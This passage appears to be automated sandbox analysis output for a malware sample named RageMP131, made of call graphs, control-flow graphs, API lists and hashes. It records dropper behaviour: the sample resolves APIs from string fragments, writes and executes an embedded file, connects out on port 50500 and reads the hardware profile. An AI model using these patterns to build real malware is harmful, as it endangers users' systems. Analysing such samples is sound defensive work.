__Getctype 24840->24865 24843 a165f2 24841->24843 24844 a13041 4 API calls 24841->24844 24843->24837 24845 a16612 24844->24845 24854 a2485d 24845->24854 24848 a239f2 RtlAllocateHeap 24849 a16626 24848->24849 24858 a224af 24849->24858 24853->24837 24855 a24874 24854->24855 24856 a1661a 24854->24856 24855->24856 24867 a24823 RtlAllocateHeap __dosmaperr 24855->24867 24856->24848 24859 a224d8 24858->24859 24864 a1662d 24858->24864 24860 a22527 24859->24860 24862 a224ff 24859->24862 24872 a12193 RtlAllocateHeap ___std_exception_copy __Getctype 24860->24872 24868 a2241e 24862->24868 24864->24843 24866 a24823 RtlAllocateHeap __dosmaperr 24864->24866 24865->24843 24866->24843 24867->24856 24869 a2242a std::_Locinfo::_Locinfo_dtor 24868->24869 24871 a22469 24869->24871 24873 a22582 24869->24873 24871->24864 24872->24864 24874 a2814e RtlAllocateHeap 24873->24874 24875 a22592 24874->24875 24878 a2814e RtlAllocateHeap 24875->24878 24883 a225ca 24875->24883 24884 a22598 24875->24884 24877 a225f0 24877->24871 24880 a225c1 24878->24880 24879 a2814e RtlAllocateHeap 24881 a225d6 FindCloseChangeNotification 24879->24881 24882 a2814e RtlAllocateHeap 24880->24882 24881->24884 24882->24883 24883->24879 24883->24884 24885 a280bd RtlAllocateHeap __dosmaperr 24884->24885 24885->24877 24886 a1abd8 24887 a1abeb ___std_exception_copy 24886->24887 24892 a1a9ba 24887->24892 24889 a1ac00 24900 a11f4c RtlAllocateHeap ___std_exception_copy 24889->24900 24891 a1ac0d 24893 a1a9f0 24892->24893 24894 a1a9c8 24892->24894 24893->24889 24894->24893 24895 a1a9d5 24894->24895 24896 a1a9f7 24894->24896 24905 a12193 RtlAllocateHeap ___std_exception_copy __Getctype 24895->24905 24901 a1a913 24896->24901 24899 a1aa2f 24899->24889 24900->24891 24902 a1a91f std::_Locinfo::_Locinfo_dtor 24901->24902 24906 a1a96e 24902->24906 24904 a1a93a 24904->24899 24905->24893 24913 a260b3 24906->24913 24912 a1a9b0 24912->24904 24930 a26075 24913->24930 24915 a260c4 24916 a1a986 24915->24916 24937 a2489d RtlAllocateHeap RtlAllocateHeap __dosmaperr __Getctype std::_Facet_Register 24915->24937 24920 a1aa31 24916->24920 24918 a2611d 24938 a24823 RtlAllocateHeap __dosmaperr 24918->24938 24923 a1aa43 24920->24923 24924 a1a9a4 24920->24924 24921 a1aa51 24939 a12193 RtlAllocateHeap ___std_exception_copy __Getctype 24921->24939 24923->24921 24923->24924 24927 a1aa87 std::locale::_Locimp::_Locimp 24923->24927 24929 a2615e SetFilePointerEx WriteFile RtlAllocateHeap RtlAllocateHeap 24924->24929 24925 a13041 4 API calls 24925->24927 24926 a239f2 RtlAllocateHeap 24926->24927 24927->24924 24927->24925 24927->24926 24928 a22dfb 4 API calls 24927->24928 24928->24927 24929->24912 24931 a26081 24930->24931 24932 a260ab 24931->24932 24933 a239f2 RtlAllocateHeap 24931->24933 24932->24915 24934 a2609c 24933->24934 24935 a2e7b4 RtlAllocateHeap 24934->24935 24936 a260a2 24935->24936 24936->24915 24937->24918 24938->24916 24939->24924

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 f07044-f07074 GetPEB 1 f07077-f0709a 0->1 2 f0709d-f070a0 1->2 3 f070a6-f070bc 2->3 4 f071ee-f0722b CreateFileA 2->4 5 f07110-f07116 3->5 6 f070be-f070c5 3->6 21 f07265-f07269 4->21 22 f0722d-f07230 4->22 8 f07118-f0711f 5->8 9 f07129-f0712f 5->9 6->5 10 f070c7-f070ce 6->10 8->9 11 f07121-f07124 8->11 12 f07131-f07138 9->12 13 f07148-f0714e 9->13 10->5 14 f070d0-f070d7 10->14 16 f071bb-f071c0 11->16 12->13 17 f0713a-f07141 12->17 18 f07150-f07157 13->18 19 f07167-f0716f 13->19 14->5 20 f070d9-f070dd 14->20 24 f071e0-f071e9 16->24 25 f071c2-f071c5 16->25 17->13 23 f07143-f07146 17->23 18->19 26 f07159-f07160 18->26 27 f07171-f07178 19->27 28 f07188-f0718e 19->28 20->5 29 f070df-f070e3 20->29 32 f07232-f07238 22->32 23->16 24->2 25->24 33 f071c7-f071ca 25->33 26->19 34 f07162-f07165 26->34 27->28 35 f0717a-f07181 27->35 30 f07190-f07197 28->30 31 f071a7-f071ad 28->31 29->16 36 f070e9-f0710b 29->36 30->31 38 f07199-f071a0 30->38 31->16 39 f071af-f071b6 31->39 40 f07246-f07252 WriteFile 32->40 41 f0723a-f07242 32->41 33->24 42 f071cc-f071cf 33->42 34->16 35->28 37 f07183-f07186 35->37 36->1 37->16 38->31 44 f071a2-f071a5 38->44 39->16 45 f071b8 39->45 47 f07255-f07262 FindCloseChangeNotification WinExec 40->47 41->32 46 f07244 41->46 42->24 48 f071d1-f071d4 42->48 44->16 45->16 46->47 47->21 48->24 49 f071d6-f071d9 48->49 49->24 50 f071db-f071de 49->50 50->4 50->24
                                    APIs
                                    • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00F07223
                                    • WriteFile.KERNELBASE(00000000,FFFFCD8F,00003E00,?,00000000), ref: 00F07252
                                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00F07256
                                    • WinExec.KERNEL32(?,00000005), ref: 00F07262
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true
                                    • Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$ChangeCloseCreateExecFindNotificationWrite
                                    • String ID: .dll$Clos$Crea$GetM$GetT$Kern$MlpxPf.exe$WinE$Writ$athA$catA$dleA$el32$lstr$odul
                                    • API String ID: 2234911746-650681566
                                    • Opcode ID: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
                                    • Instruction ID: dd09346e05613329d63311ccc472e2a6d02328f73a08eaac7cb1ea193d776934
                                    • Opcode Fuzzy Hash: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
                                    • Instruction Fuzzy Hash: 90612C75D09315DBCF24DF94C884AADF7B1BF48325F2582AAD505AB2C1C370AE81EB91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 51 94db60-94db92 WSAStartup 52 94dc66-94dc6f 51->52 53 94db98-94dbc2 call 937d20 * 2 51->53 58 94dbc4-94dbc8 53->58 59 94dbce-94dc14 53->59 58->52 58->59 61 94dc16-94dc1c 59->61 62 94dc60-94dc65 59->62 63 94dc74-94dc7e 61->63 64 94dc1e 61->64 62->52 63->62 69 94dc80-94dc88 63->69 66 94dc24-94dc38 socket 64->66 66->62 68 94dc3a-94dc4a connect 66->68 70 94dc70 68->70 71 94dc4c-94dc54 closesocket 68->71 70->63 71->66 72 94dc56-94dc5a 71->72 72->62
                                    APIs
                                    • WSAStartup.WS2_32 ref: 0094DB8B
                                    • socket.WS2_32(?,?,?,?,?,?,50500,?,?), ref: 0094DC2E
                                    • connect.WS2_32(00000000,?,?,?,?,?,50500,?,?), ref: 0094DC42
                                    • closesocket.WS2_32(00000000), ref: 0094DC4D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true
                                    • Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Startupclosesocketconnectsocket
                                    • String ID: 50500$`4u
                                    • API String ID: 3098855095-1883443620
                                    • Opcode ID: e9ddc2d38e1eeebf60a3641584d09f99e716d92cd9d1e05baf2c048076a2aa99
                                    • Instruction ID: 4030251839116887ed262265b58f032438b6706291f9c564825b9496dc319f1b
                                    • Opcode Fuzzy Hash: e9ddc2d38e1eeebf60a3641584d09f99e716d92cd9d1e05baf2c048076a2aa99
                                    • Instruction Fuzzy Hash: AD31D3766053456BC7209F648C84B3BB7E9FF89735F001F1DF9A8932E0E37098058692

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 73 54c09c6-54c0a12 call 54c0a13 80 54c0a74-54c0c10 73->80 81 54c0a14-54c0a73 73->81 106 54c0c22-54c0c34 GetCurrentHwProfileW 80->106 81->80 108 54c0c39-54c0d61 call 54c0d64 106->108 122 54c0daf-54c0e08 call 54c0e04 108->122 123 54c0d63 108->123 128 54c0e68-54c0e6e 122->128 129 54c0e0a-54c0e56 122->129 131 54c0e6f-54c0ea3 call 54c0ea7 128->131 129->131 138 54c0eaa-54c0eaf 131->138 139 54c0ea5-54c0ea9 131->139 140 54c0ec5-54c0f06 138->140 141 54c0f0c-54c0f13 139->141 142 54c0eab-54c0eaf 139->142 143 54c0f14-54c0f9d 140->143 141->143 142->140
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: gA@V
                                    • API String ID: 0-2224835733
                                    • Opcode ID: b81c28348a5d8d88e10f67c9386876b6629db071587c6dccff463e1600eb073f
                                    • Instruction ID: a7bb1677e83a82e6f178bc0fca220ae6abe8173cebcb3a5cc54d3a94a9822df7
                                    • Opcode Fuzzy Hash: b81c28348a5d8d88e10f67c9386876b6629db071587c6dccff463e1600eb073f
                                    • Instruction Fuzzy Hash: 46518EEF14D110FDA192C5816B5CAFE6E6FE6E6730B3084AFB40FD6642E2D50E8A5131

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 156 54c09ae-54c09ba 157 54c09bc-54c09be 156->157 158 54c0a33-54c0c10 156->158 159 54c09c0 157->159 182 54c0c22-54c0c34 GetCurrentHwProfileW 158->182 159->159 184 54c0c39-54c0d61 call 54c0d64 182->184 198 54c0daf-54c0e08 call 54c0e04 184->198 199 54c0d63 184->199 204 54c0e68-54c0e6e 198->204 205 54c0e0a-54c0e56 198->205 207 54c0e6f-54c0ea3 call 54c0ea7 204->207 205->207 214 54c0eaa-54c0eaf 207->214 215 54c0ea5-54c0ea9 207->215 216 54c0ec5-54c0f06 214->216 217 54c0f0c-54c0f13 215->217 218 54c0eab-54c0eaf 215->218 219 54c0f14-54c0f9d 216->219 217->219 218->216
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 54a19ced1ec70d7e575638507adfa6f9c73a601b1f87680f5f20ac044884aa83
                                    • Instruction ID: 95413ea5bb53d6d3d76e91af5ba4798554953e37f3cedb29390c56ec6f91fe69
                                    • Opcode Fuzzy Hash: 54a19ced1ec70d7e575638507adfa6f9c73a601b1f87680f5f20ac044884aa83
                                    • Instruction Fuzzy Hash: AF7170EF24D214FDA192C1852B5CAFE6F6EE6D763073084AFF40FD6642E6D40A4A5131

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 232 54c09de-54c09e0 233 54c09ec-54c0a12 call 54c0a13 232->233 234 54c09e2 232->234 245 54c0a74-54c0c10 233->245 246 54c0a14-54c0a73 233->246 235 54c097c-54c09a9 call 54c0990 234->235 236 54c09e4-54c09e8 234->236 244 54c09c0 235->244 236->233 244->244 271 54c0c22-54c0c34 GetCurrentHwProfileW 245->271 246->245 273 54c0c39-54c0d61 call 54c0d64 271->273 287 54c0daf-54c0e08 call 54c0e04 273->287 288 54c0d63 273->288 293 54c0e68-54c0e6e 287->293 294 54c0e0a-54c0e56 287->294 296 54c0e6f-54c0ea3 call 54c0ea7 293->296 294->296 303 54c0eaa-54c0eaf 296->303 304 54c0ea5-54c0ea9 296->304 305 54c0ec5-54c0f06 303->305 306 54c0f0c-54c0f13 304->306 307 54c0eab-54c0eaf 304->307 308 54c0f14-54c0f9d 305->308 306->308 307->305
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 66bd857502ee362e7b76eb389d04ff74215645c94a3cfe19f379a0292799439a
                                    • Instruction ID: 7244522aaada4391253fc71ec48913e7ff7f67d6d152c80ce138b3236d94764a
                                    • Opcode Fuzzy Hash: 66bd857502ee362e7b76eb389d04ff74215645c94a3cfe19f379a0292799439a
                                    • Instruction Fuzzy Hash: C7519CEF10D214FDA182C5856B5CAFE6E6FE6E7730B3084AFF40FD6602E2950A4A5131

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 321 54c0a2a-54c0a2f 322 54c09f4-54c0a12 call 54c0a13 321->322 323 54c0a31-54c0a32 321->323 332 54c0a74-54c0c10 322->332 333 54c0a14-54c0a25 322->333 324 54c0a34-54c0a36 323->324 325 54c09f2-54c09f3 323->325 327 54c0a37-54c0a73 324->327 325->322 327->332 355 54c0c22-54c0c34 GetCurrentHwProfileW 332->355 333->327 357 54c0c39-54c0d61 call 54c0d64 355->357 371 54c0daf-54c0e08 call 54c0e04 357->371 372 54c0d63 357->372 377 54c0e68-54c0e6e 371->377 378 54c0e0a-54c0e56 371->378 380 54c0e6f-54c0ea3 call 54c0ea7 377->380 378->380 387 54c0eaa-54c0eaf 380->387 388 54c0ea5-54c0ea9 380->388 389 54c0ec5-54c0f06 387->389 390 54c0f0c-54c0f13 388->390 391 54c0eab-54c0eaf 388->391 392 54c0f14-54c0f9d 389->392 390->392 391->389
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8fc902947dd84f4aaf25849ac8b0638808af3ac90e4be460d653b307dad3d9ed
                                    • Instruction ID: e5ce8b9333491cc941122caf1004e58b01d743dc8df9c3f9a561bb9429f9ec09
                                    • Opcode Fuzzy Hash: 8fc902947dd84f4aaf25849ac8b0638808af3ac90e4be460d653b307dad3d9ed
                                    • Instruction Fuzzy Hash: 2151CFEF14D211FDA282C1856B5CAFE6F6EE6D673073084AFF40FC6642E2940E4A5131

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 405 54c09f9-54c0a04 406 54c099f-54c09a9 405->406 407 54c0a06-54c0a12 call 54c0a13 405->407 408 54c09c0 406->408 412 54c0a74-54c0c10 407->412 413 54c0a14-54c0a73 407->413 408->408 438 54c0c22-54c0c34 GetCurrentHwProfileW 412->438 413->412 440 54c0c39-54c0d61 call 54c0d64 438->440 454 54c0daf-54c0e08 call 54c0e04 440->454 455 54c0d63 440->455 460 54c0e68-54c0e6e 454->460 461 54c0e0a-54c0e56 454->461 463 54c0e6f-54c0ea3 call 54c0ea7 460->463 461->463 470 54c0eaa-54c0eaf 463->470 471 54c0ea5-54c0ea9 463->471 472 54c0ec5-54c0f06 470->472 473 54c0f0c-54c0f13 471->473 474 54c0eab-54c0eaf 471->474 475 54c0f14-54c0f9d 472->475 473->475 474->472
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6cf4a83a3c339f19937b5552c8ab1b068026f51c968e2f974ed28738e49c79e2
                                    • Instruction ID: abf624c776b48f1aed3a4db945ccad9776c0fdb38f94baf920263614863a0967
                                    • Opcode Fuzzy Hash: 6cf4a83a3c339f19937b5552c8ab1b068026f51c968e2f974ed28738e49c79e2
                                    • Instruction Fuzzy Hash: AF519CEF14D110FDA292C1856B5CAFE6E6FE6D6730B3084AFF40FD6642E2940A8A5131

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 488 54c0a13-54c0c10 514 54c0c22-54c0c34 GetCurrentHwProfileW 488->514 516 54c0c39-54c0d61 call 54c0d64 514->516 530 54c0daf-54c0e08 call 54c0e04 516->530 531 54c0d63 516->531 536 54c0e68-54c0e6e 530->536 537 54c0e0a-54c0e56 530->537 539 54c0e6f-54c0ea3 call 54c0ea7 536->539 537->539 546 54c0eaa-54c0eaf 539->546 547 54c0ea5-54c0ea9 539->547 548 54c0ec5-54c0f06 546->548 549 54c0f0c-54c0f13 547->549 550 54c0eab-54c0eaf 547->550 551 54c0f14-54c0f9d 548->551 549->551 550->548
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C34
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: e9e623a55dd2f21fcbccd58e4380a95624beff225bdd2aa55fdb6d9b71bf1b88
                                    • Instruction ID: d98c466a74f54532b6106e32b482c6861111becb59e1802ab6c688b9b2dc00ac
                                    • Opcode Fuzzy Hash: e9e623a55dd2f21fcbccd58e4380a95624beff225bdd2aa55fdb6d9b71bf1b88
                                    • Instruction Fuzzy Hash: B6418CEF14D110FDB192C5856B5CAFE6E6FE6E6730B3084ABB40FD6642E2D40E8A5131

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 564 54c0a1e-54c0c10 590 54c0c22-54c0c34 GetCurrentHwProfileW 564->590 592 54c0c39-54c0d61 call 54c0d64 590->592 606 54c0daf-54c0e08 call 54c0e04 592->606 607 54c0d63 592->607 612 54c0e68-54c0e6e 606->612 613 54c0e0a-54c0e56 606->613 615 54c0e6f-54c0ea3 call 54c0ea7 612->615 613->615 622 54c0eaa-54c0eaf 615->622 623 54c0ea5-54c0ea9 615->623 624 54c0ec5-54c0f06 622->624 625 54c0f0c-54c0f13 623->625 626 54c0eab-54c0eaf 623->626 627 54c0f14-54c0f9d 624->627 625->627 626->624
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C34
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: f529b7854fa8fb033338f11aac1f98b894af816f941a9e627324e48d74ba4b03
                                    • Instruction ID: ba62b19d239130023e13d8b76d042c9542a8dbeb0db8da1a58e9c178d8f8c57b
                                    • Opcode Fuzzy Hash: f529b7854fa8fb033338f11aac1f98b894af816f941a9e627324e48d74ba4b03
                                    • Instruction Fuzzy Hash: 3C419DEF14D110FDB192C5856B5CAFE6EAFE6D6730B3084ABB40FD6642E2D40E8A5131

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 640 54c0a50-54c0c10 662 54c0c22-54c0c34 GetCurrentHwProfileW 640->662 664 54c0c39-54c0d61 call 54c0d64 662->664 678 54c0daf-54c0e08 call 54c0e04 664->678 679 54c0d63 664->679 684 54c0e68-54c0e6e 678->684 685 54c0e0a-54c0e56 678->685 687 54c0e6f-54c0ea3 call 54c0ea7 684->687 685->687 694 54c0eaa-54c0eaf 687->694 695 54c0ea5-54c0ea9 687->695 696 54c0ec5-54c0f06 694->696 697 54c0f0c-54c0f13 695->697 698 54c0eab-54c0eaf 695->698 699 54c0f14-54c0f9d 696->699 697->699 698->696
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C34
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 69ae2144c7255bb6961e8e4889658b9b5b37ca6ff6aff6a6cf2d12800044bd74
                                    • Instruction ID: 200f18a974aac0397b46cfb482cbd2ddb11d12291ee0b2698cd7adf6d28f4942
                                    • Opcode Fuzzy Hash: 69ae2144c7255bb6961e8e4889658b9b5b37ca6ff6aff6a6cf2d12800044bd74
                                    • Instruction Fuzzy Hash: 5841AFEF24D114FDB282C5856B58AFA6E6FE6D7730B3084ABB40FD6642E2D40A4A5131

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 712 54c0a6d-54c0c10 734 54c0c22-54c0c34 GetCurrentHwProfileW 712->734 736 54c0c39-54c0d61 call 54c0d64 734->736 750 54c0daf-54c0e08 call 54c0e04 736->750 751 54c0d63 736->751 756 54c0e68-54c0e6e 750->756 757 54c0e0a-54c0e56 750->757 759 54c0e6f-54c0ea3 call 54c0ea7 756->759 757->759 766 54c0eaa-54c0eaf 759->766 767 54c0ea5-54c0ea9 759->767 768 54c0ec5-54c0f06 766->768 769 54c0f0c-54c0f13 767->769 770 54c0eab-54c0eaf 767->770 771 54c0f14-54c0f9d 768->771 769->771 770->768
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C34
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 6b83d38be5810e94228ea02d3d0547dfbdbd9440257ba6cea13f67f58d71d8fa
                                    • Instruction ID: db60c4f9621ead0bf5eeb9130a14d99ed37b1739bafb01cef53fbf75fa8109f7
                                    • Opcode Fuzzy Hash: 6b83d38be5810e94228ea02d3d0547dfbdbd9440257ba6cea13f67f58d71d8fa
                                    • Instruction Fuzzy Hash: 1341AEEF24D111FDB282C5856B5CAFE6A6FE6D7730B3084ABB40FD6542E2D40E8A5131

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 784 54c0a82-54c0c10 803 54c0c22-54c0c34 GetCurrentHwProfileW 784->803 805 54c0c39-54c0d61 call 54c0d64 803->805 819 54c0daf-54c0e08 call 54c0e04 805->819 820 54c0d63 805->820 825 54c0e68-54c0e6e 819->825 826 54c0e0a-54c0e56 819->826 828 54c0e6f-54c0ea3 call 54c0ea7 825->828 826->828 835 54c0eaa-54c0eaf 828->835 836 54c0ea5-54c0ea9 828->836 837 54c0ec5-54c0f06 835->837 838 54c0f0c-54c0f13 836->838 839 54c0eab-54c0eaf 836->839 840 54c0f14-54c0f9d 837->840 838->840 839->837
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C34
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 868680c460dca95378be2105d6dd61d86ba92e255df82f05589a3226e82d61f2
                                    • Instruction ID: 63e288752a6f1440b820733bea49249d2d68edd8732dffbb72b87b9b4b68c389
                                    • Opcode Fuzzy Hash: 868680c460dca95378be2105d6dd61d86ba92e255df82f05589a3226e82d61f2
                                    • Instruction Fuzzy Hash: 98419CEF14D111FDB282C5816B5CAFA6B6FE6D6730B3084ABF40FD2542E2D40A8A5131

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 853 54c0a99-54c0c10 872 54c0c22-54c0c34 GetCurrentHwProfileW 853->872 874 54c0c39-54c0d61 call 54c0d64 872->874 888 54c0daf-54c0e08 call 54c0e04 874->888 889 54c0d63 874->889 894 54c0e68-54c0e6e 888->894 895 54c0e0a-54c0e56 888->895 897 54c0e6f-54c0ea3 call 54c0ea7 894->897 895->897 904 54c0eaa-54c0eaf 897->904 905 54c0ea5-54c0ea9 897->905 906 54c0ec5-54c0f06 904->906 907 54c0f0c-54c0f13 905->907 908 54c0eab-54c0eaf 905->908 909 54c0f14-54c0f9d 906->909 907->909 908->906
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C34
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 1f142a8440c5c978d56e98e7edc94098ad8e3fc7000d1d55f0577b91dc0074fb
                                    • Instruction ID: 0369a23e6041308dc4281909d85fe1eaeee8aa724e96bde6df21591849bb56d5
                                    • Opcode Fuzzy Hash: 1f142a8440c5c978d56e98e7edc94098ad8e3fc7000d1d55f0577b91dc0074fb
                                    • Instruction Fuzzy Hash: 6F419DEF14D114FDB182C6856B5CAFE6BAFE6D6730B3084ABF40FD6542E2D40A8A5131

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
